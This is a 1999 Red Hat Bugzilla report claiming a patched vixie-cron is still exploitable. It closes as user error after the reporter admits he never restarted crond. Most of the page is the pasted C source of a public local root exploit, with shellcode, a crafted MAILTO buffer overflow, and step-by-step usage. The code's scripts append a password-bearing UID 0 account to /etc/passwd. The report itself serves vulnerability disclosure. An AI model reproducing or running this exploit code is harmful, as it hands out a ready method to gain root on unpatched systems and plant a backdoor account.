Bug 5819 - vixie cron exploit still works !
Summary: vixie cron exploit still works !
Keywords:
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: vixie-cron
Version: 6.0
Hardware: All
OS: Linux
high
medium
Target Milestone: ---
Assignee: Crutcher Dunnavant
QA Contact:
URL: http://www.life.be
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-10-11 05:43 UTC by shivan
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2001-04-10 22:05:26 UTC
Embargoed:


Attachments (Terms of Use)

Description shivan 1999-10-11 05:43:13 UTC
'lo ..

i tried the vixie cron exploit which came out on 08/25/1999,
and it still works.

normally this exploit should have been fixed with
vixie-cron-3.0.1-37 , i installed upto 3.0.1-39 , and the
buffer overflow still works. I tried this on several
machines (all RH 6.0) with different kernels. (this also
works on alpha)

Please inform me ASAP about the progress on this bug
(original exploit pasted below).

Kind Regards,
Dimitri Avgoustakis
UNIX Administrator ..
LIFE - The Linux Company

exploit located on bugtraq :
"http://www.securityfocus.com/data/vulnerabilities/exploits/
crontab_exploit.c"

/*
        vixie-crontab-3.0.1 cron_popen() exploit by Akke -
30-8-99
                        Akke <c4c4>


        how to compile ?
                gcc crontab_exploit.c -o crontab_exploit

        how to use ?
                ./crontab_exploit
                crontab ./CrOn
                wait 1 minute
                crontab -r
                su -l cronexpl (password = exploited) (this
is root account)

        Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb
0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x4
0\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
        char crontab_file_string[max_buf_len];
        char temp[max_buf_len];
        FILE *fp;
        int i;

        strcpy(temp,
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w
r i t t e n _ b y _ A K K E _ "
        "_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
        sprintf(temp,"%s%s",temp,shellcode);
        sprintf(crontab_file_string,"MAILTO=%s\n",temp);
        strcat(crontab_file_string,"0");
        for (i=1;i<60;i++)
sprintf(crontab_file_string,"%s,%d",crontab_file_string,i);
        sprintf(temp," * * * * %s\n",CronEchoScript);
        strcat(crontab_file_string,temp);

        if ((fp = fopen(CronFile,"w+")) != NULL) {
                fprintf(fp,"%s",crontab_file_string);
                fclose(fp);
        }

        if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\necho Wrong window!");
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,CronEchoScript);
                system(temp);
        }

        if ((fp = fopen(RootScript,"w+")) != NULL) {
                #define login "cronexpl"
                #define passw "1T8uqGnJZ0OsQ" /* "exploited"
*/
                fprintf(fp,"#!/bin/sh\necho
%s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s
%s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,RootScript);
                system(temp);
        }

        if ((fp = fopen("/tmp/ce","w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777
%s",chmod_bin,"/tmp/ce");
                system(temp);
        }
        exit(0);
}

Comment 1 shivan 1999-10-11 06:24:59 UTC
RHSA-1999:030-01: vixie-cron crond MAILTO

Comment 2 shivan 1999-10-11 07:10:59 UTC
dear redhat,

i'm pleased to tell you i'm stupid ..
i forgot to stop/start cond after upgrading ..

my apollogies ;)


Note You need to log in before you can comment on or make changes to this bug.